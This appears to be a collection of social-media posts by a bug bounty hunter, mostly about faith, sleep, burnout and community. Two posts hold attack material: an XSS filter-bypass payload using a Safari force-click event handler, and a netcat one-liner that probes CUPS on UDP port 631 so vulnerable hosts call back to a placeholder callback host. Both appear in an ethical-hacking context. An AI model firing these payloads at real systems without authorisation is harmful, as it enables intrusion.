"Dishonest money dwindles away, but whoever gathers money little by little makes it grow." Proverbs 13:11

Still learning things in the bug bounty space. Here are a few. 1 - Your health is more important than work. Mental and physical. 2 - Sticking to one high ROI target all year works best. 3 - Keep your body in a normal rhythm and have faith in the one who created us.

Daily reminder to gives thanks to Christ for every good thing in life. The opportunities and wisdom you have is not by accident. Praise the one who makes us truly free.

Latest lesser known event handler used to bypass a powerful XSS filter in a constrained context. Works in Safari + trackpad click. " onwebkitmouseforcewillbegin="confirm(origin)" #xss #bugbounty #bugbountytips #hackerone #infosec #xsspayloads #exploit #hacking #ethicalhacking

I submitted my most critical bug yet on @Hacker0x01 . Lets see how it goes!

You should sleep more. I know it’s cliche to talk about, but hear me out. I love staying up late, especially while hacking. But it clicked for me as the “best decision” (to get more of sleep) when I learned that it leads to stronger willpower for eating healthy, exercising, and

me, when cybersecurity was the center of my life: exhausted, burnt-out, struggling to balance my friends and family, mental health was poor me, when cybersecurity is just my *job* and not *who i am*: more sleep, less anxiety, happier, calmer, a more balanced life filled with

Just logged into Rocket League to see the white hat topper on my account. Still one of the coolest swag items from the Epic live event. #rocketleague #epicgames

What is your highest bounty for an informative report? This one is from last year's h1-305 LHE.

One day, the technique for exploiting this vulnerability will be available. Not today, but one day. Working with other bug hunters makes a huge difference. Two minds bouncing ideas off each other leads to peak efficiency.

How cool & chill is the #bugbounty community, when we enjoy helping eachother out more than money?! fr fr Thanks again @stealthybugs

Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by @albinowax . After Param Miner discovered the header it was all manual testing to detect the template engine

Command line PoC to detect the Linux Cups RCE. If a host is vulnerable requests will hit your callback host. echo -n "0 3 http://{yourcallback}:80/printers/whatever" | nc -u {target} 631 #rce #bugbounty #bugbountytips #hackerone #infosec #hacking #ethicalhacking #infosec

nobody will remember: - your bounty earnings - how “busy you were” - how many hours you worked people will remember: - your @Hacker0x01 Elite poster - that one insane exploit you disclosed - the tools you open sourced